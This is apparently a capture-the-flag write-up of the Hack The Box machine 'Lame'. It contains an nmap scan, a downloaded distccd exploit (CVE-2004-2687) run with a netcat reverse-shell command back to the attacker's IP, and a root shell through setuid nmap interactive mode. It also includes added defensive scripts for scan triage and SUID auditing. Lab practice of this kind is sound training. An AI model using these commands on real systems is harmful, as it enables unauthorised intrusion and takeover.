HTB Lame done
Lame
OS:
Linux
Notes
21 FTP - anonymous empty folder
22 SSH - stop
139/445 SMB - to test
3632 distccd - to test
Technology:
vsftpd 2.3.4
distccd v1 ((GNU) 4.2.4
IP Address:
10.10.10.3
Open ports:
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Users and pass:
Nmap
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Lame]
└─$ sudo nmap -A -sV --script=default -p- --open -oA 10.10.10.3_nmap 10.10.10.3 ; cat 10.10.10.3_nmap.nmap | grep "tcp.*open"
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-01 13:49 CEST
Nmap scan report for 10.10.10.3
Host is up (0.031s latency).
Not shown: 65530 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.15.88
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.23 (91%), DD-WRT v24-sp1 (Linux 2.4.36) (90%), Arris TG862G/CT cable modem (90%), D-Link DAP-1522 WAP, or Xerox WorkCentre Pro 245 or 6556 printer (90%), Dell Integrated Remote Access Controller (iDRAC6) (90%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (90%), Linux 2.4.21 - 2.4.31 (likely embedded) (90%), Linux 2.4.27 (90%), Linux 2.4.7 (90%), Citrix XenServer 5.5 (Linux 2.6.18) (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 2h00m24s, deviation: 2h49m46s, median: 21s
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: lame
| NetBIOS computer name:
| Domain name: hackthebox.gr
| FQDN: lame.hackthebox.gr
|_ System time: 2024-08-01T07:53:24-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
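Triage of the scan above as a defender would do it. This is an added example, not part of the original notes: it parses the port table and script hints from the nmap normal output (sample lines constructed from the scan) and flags the exposures this host shows, the distccd daemon (CVE-2004-2687), anonymous FTP, and disabled SMB message signing.

```python
import re

# Constructed sample: service lines and script hints copied from the scan above.
SCAN_LINES = """\
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Host script results:
| smb-security-mode:
|_ message_signing: disabled (dangerous, but default)
""".splitlines()

# One 'PORT STATE SERVICE VERSION' row of nmap normal output.
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


def parse_ports(lines):
    """Return one dict per port row; script output lines are skipped."""
    ports = []
    for line in lines:
        m = PORT_RE.match(line.strip())
        if m:
            ports.append({"port": int(m.group(1)), "proto": m.group(2),
                          "state": m.group(3), "service": m.group(4),
                          "version": m.group(5).strip()})
    return ports


def triage(lines):
    """Flag exposures as (port or None, message); script hints are attributed to
    the port row they follow, host-level scripts to None."""
    findings, current = [], None
    for line in lines:
        m = PORT_RE.match(line.strip())
        if m:
            current = int(m.group(1))
            if m.group(3) == "open" and m.group(4) == "distccd":
                # distccd takes compile jobs from any client: CVE-2004-2687
                findings.append((current, "distccd reachable: unauthenticated command "
                                          "execution (CVE-2004-2687); firewall or disable"))
            continue
        if line.startswith("Host script results"):
            current = None
        hint = line.lstrip("|_ ").strip()
        if hint.startswith("ftp-anon:") and "login allowed" in hint:
            findings.append((current, "anonymous FTP login enabled"))
        elif hint.startswith("message_signing:") and "disabled" in hint:
            findings.append((current, "SMB message signing disabled"))
    return findings
```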
Exploit: (CVE-2004-2687) DistCC Daemon - Command Execution (Python)
https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855
Download exploit
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Lame]
└─$ wget https://gist.githubusercontent.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855/raw/261b638bb05d02b67b6ad67fa9cf3c74a73de6c6/distccd_rce_CVE-2004-2687.py
--2024-08-01 14:11:58-- https://gist.githubusercontent.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855/raw/261b638bb05d02b67b6ad67fa9cf3c74a73de6c6/distccd_rce_CVE-2004-2687.py
Resolving gist.githubusercontent.com (gist.githubusercontent.com)... 185.199.110.133, 185.199.111.133, 185.199.109.133, ...
Connecting to gist.githubusercontent.com (gist.githubusercontent.com)|185.199.110.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2631 (2.6K) [text/plain]
Saving to: ‘distccd_rce_CVE-2004-2687.py’
distccd_rce_CVE-2004-2687.py 100%[==============================================>] 2.57K --.-KB/s in 0s
2024-08-01 14:11:59 (62.3 MB/s) - ‘distccd_rce_CVE-2004-2687.py’ saved [2631/2631]
Run exploit
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Lame]
└─$ python2 distccd_rce_CVE-2004-2687.py -t 10.10.10.3 -c "nc 10.10.15.88 80 -e /bin/bash"
[OK] Connected to remote service
[KO] Socket Timeout
---
┌──(kali㉿kali)-[~/…/oscp/writeups/HTB/HTB_Lame]
└─$ netcat -lvnp 80
listening on [any] 80 ...
connect to [10.10.15.88] from (UNKNOWN) [10.10.10.3] 37005
whereis python
python: /usr/bin/python2.5-config /usr/bin/python /usr/bin/python2.5 /etc/python /etc/python2.5 /usr/lib/python2.3 /usr/lib/python2.5 /usr/lib/python2.4 /usr/local/lib/python2.5 /usr/include/python2.5 /usr/share/python /usr/share/man/man1/python.1.gz
/usr/bin/python -c 'import pty; pty.spawn("/bin/bash")'
daemon@lame:/tmp$
Read flag: user.txt
daemon@lame:/tmp$ find / -name "user.txt" 2>/dev/null
find / -name "user.txt" 2>/dev/null
/home/makis/user.txt
daemon@lame:/tmp$
daemon@lame:/tmp$ cd /home/makis
cd /home/makis
daemon@lame:/home/makis$
daemon@lame:/home/makis$ ls -la
ls -la
total 36
drwxr-xr-x 4 makis makis 4096 Aug 1 06:25 .
drwxr-xr-x 6 root root 4096 Mar 14 2017 ..
-rw------- 1 makis makis 1107 Mar 14 2017 .bash_history
-rw-r--r-- 1 makis makis 220 Mar 14 2017 .bash_logout
-rw-r--r-- 1 makis makis 2928 Mar 14 2017 .bashrc
drwx------ 2 makis makis 4096 Aug 1 06:25 .gconf
drwx------ 2 makis makis 4096 Aug 1 06:25 .gconfd
-rw-r--r-- 1 makis makis 586 Mar 14 2017 .profile
-rw-r--r-- 1 makis makis 0 Mar 14 2017 .sudo_as_admin_successful
-rw-r--r-- 1 makis makis 33 Aug 1 06:15 user.txt
daemon@lame:/home/makis$
daemon@lame:/home/makis$ cat user.txt ; id ; ip
cat user.txt ; id ; ip
b8e710c5ad51ecd248bc358caf29f621
uid=1(daemon) gid=1(daemon) groups=1(daemon)
Usage: ip [ OPTIONS ] OBJECT { COMMAND | help }
ip [ -force ] [-batch filename
where OBJECT := { link | addr | route | rule | neigh | ntable | tunnel |
maddr | mroute | monitor | xfrm }
OPTIONS := { -V[ersion] | -s[tatistics] | -d[etails] | -r[esolve] |
-f[amily] { inet | inet6 | ipx | dnet | link } |
-o[neline] | -t[imestamp] }
daemon@lame:/home/makis$ cat user.txt ; id ; ip a
cat user.txt ; id ; ip a
b8e710c5ad51ecd248bc358caf29f621
uid=1(daemon) gid=1(daemon) groups=1(daemon)
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
link/ether 00:50:56:94:f2:aa brd ff:ff:ff:ff:ff:ff
inet 10.10.10.3/24 brd 10.10.10.255 scope global eth0
inet6 dead:beef::250:56ff:fe94:f2aa/64 scope global dynamic
valid_lft 86397sec preferred_lft 14397sec
inet6 fe80::250:56ff:fe94:f2aa/64 scope link
valid_lft forever preferred_lft forever
daemon@lame:/home/makis$
Privilege Escalation
Find SUID
daemon@lame:/var/backups$ find / -perm /4000 2>/dev/null
find / -perm /4000 2>/dev/null
/bin/umount
/bin/fusermount
/bin/su
/bin/mount
/bin/ping
/bin/ping6
/sbin/mount.nfs
/lib/dhcp3-client/call-dhclient-script
/usr/bin/sudoedit
/usr/bin/X
/usr/bin/netkit-rsh
/usr/bin/gpasswd
/usr/bin/traceroute6.iputils
/usr/bin/sudo
/usr/bin/netkit-rlogin
/usr/bin/arping
/usr/bin/at
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/nmap
/usr/bin/chsh
/usr/bin/netkit-rcp
/usr/bin/passwd
/usr/bin/mtr
/usr/sbin/uuidd
/usr/sbin/pppd
/usr/lib/telnetlogin
/usr/lib/apache2/suexec
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/pt_chown
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
GTFObins - nmap
daemon@lame:/home/makis$ nmap --interactive
nmap --interactive
Starting Nmap V. 4.53 ( http://insecure.org )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
sh-3.2# id
id
uid=1(daemon) gid=1(daemon) euid=0(root) groups=1(daemon)
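A SUID audit that would have caught the setuid nmap before it was abused. This is an added example, not part of the original notes: `collect_suid` walks a live filesystem the way `find / -perm /4000` does, and `triage_suid` classifies each path against a constructed baseline of expected setuid binaries and a constructed watchlist of binaries that can spawn a shell (nmap's interactive mode, present in the Nmap 4.53 build above, is the case this session uses).

```python
import os
import stat

# Constructed baseline: setuid binaries a stock Debian-era install is expected to
# carry. Anything outside it deserves review.
EXPECTED = {"/bin/su", "/bin/mount", "/bin/umount", "/bin/ping", "/bin/ping6",
            "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/sudoedit", "/usr/bin/chsh",
            "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/newgrp"}
# Constructed watchlist: programs that can hand out a shell while running setuid.
SHELL_CAPABLE = {"nmap", "find", "vim", "python", "perl", "bash", "env"}

# Constructed sample: a subset of the `find / -perm /4000` output above.
SAMPLE = """/bin/umount
/bin/su
/bin/mount
/bin/ping
/usr/bin/sudo
/usr/bin/nmap
/usr/bin/passwd
/usr/bin/mtr
/usr/lib/openssh/ssh-keysign
""".splitlines()


def collect_suid(root="/"):
    """Walk the real filesystem and return regular files with the setuid bit set."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # lstat: do not follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(path)
    return found


def triage_suid(paths):
    """Map each SUID path to 'high' (can spawn a shell), 'review' (not in the
    baseline) or 'expected'."""
    report = {}
    for path in paths:
        if os.path.basename(path) in SHELL_CAPABLE:
            report[path] = "high"
        elif path not in EXPECTED:
            report[path] = "review"
        else:
            report[path] = "expected"
    return report


def high_risk(paths):
    """Paths that should lose the setuid bit (chmod u-s) or be removed."""
    return sorted(p for p, level in triage_suid(paths).items() if level == "high")
```

Running `high_risk(collect_suid())` on the box itself lists `/usr/bin/nmap`; on a real fleet the baseline would be generated from a clean image rather than typed in.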
Read flag: root.txt
sh-3.2# cd /root
cd /root
sh-3.2# ls -la
ls -la
total 80
drwxr-xr-x 13 root root 4096 Aug 1 06:15 .
drwxr-xr-x 21 root root 4096 Oct 31 2020 ..
-rw------- 1 root root 373 Aug 1 06:15 .Xauthority
lrwxrwxrwx 1 root root 9 May 14 2012 .bash_history -> /dev/null
-rw-r--r-- 1 root root 2227 Oct 20 2007 .bashrc
drwx------ 3 root root 4096 May 20 2012 .config
drwx------ 2 root root 4096 May 20 2012 .filezilla
drwxr-xr-x 5 root root 4096 Aug 1 06:15 .fluxbox
drwx------ 2 root root 4096 May 20 2012 .gconf
drwx------ 2 root root 4096 May 20 2012 .gconfd
drwxr-xr-x 2 root root 4096 May 20 2012 .gstreamer-0.10
drwx------ 4 root root 4096 May 20 2012 .mozilla
-rw-r--r-- 1 root root 141 Oct 20 2007 .profile
drwx------ 5 root root 4096 May 20 2012 .purple
-rwx------ 1 root root 4 May 20 2012 .rhosts
drwxr-xr-x 2 root root 4096 May 20 2012 .ssh
drwx------ 2 root root 4096 Aug 1 06:15 .vnc
drwxr-xr-x 2 root root 4096 May 20 2012 Desktop
-rwx------ 1 root root 401 May 20 2012 reset_logs.sh
-rw------- 1 root root 33 Aug 1 06:15 root.txt
-rw-r--r-- 1 root root 118 Aug 1 06:15 vnc.log
sh-3.2#
sh-3.2# cat root.txt ; id ; ip a
cat root.txt ; id ; ip a
66371e4b13ed785c278b931de4ed9ffd
uid=1(daemon) gid=1(daemon) euid=0(root) groups=1(daemon)
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
link/ether 00:50:56:94:f2:aa brd ff:ff:ff:ff:ff:ff
inet 10.10.10.3/24 brd 10.10.10.255 scope global eth0
inet6 dead:beef::250:56ff:fe94:f2aa/64 scope global dynamic
valid_lft 86399sec preferred_lft 14399sec
inet6 fe80::250:56ff:fe94:f2aa/64 scope link
valid_lft forever preferred_lft forever
sh-3.2#
References
[(CVE-2004-2687) DistCC Daemon - Command Execution (Python)](https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855)
Lessons Learned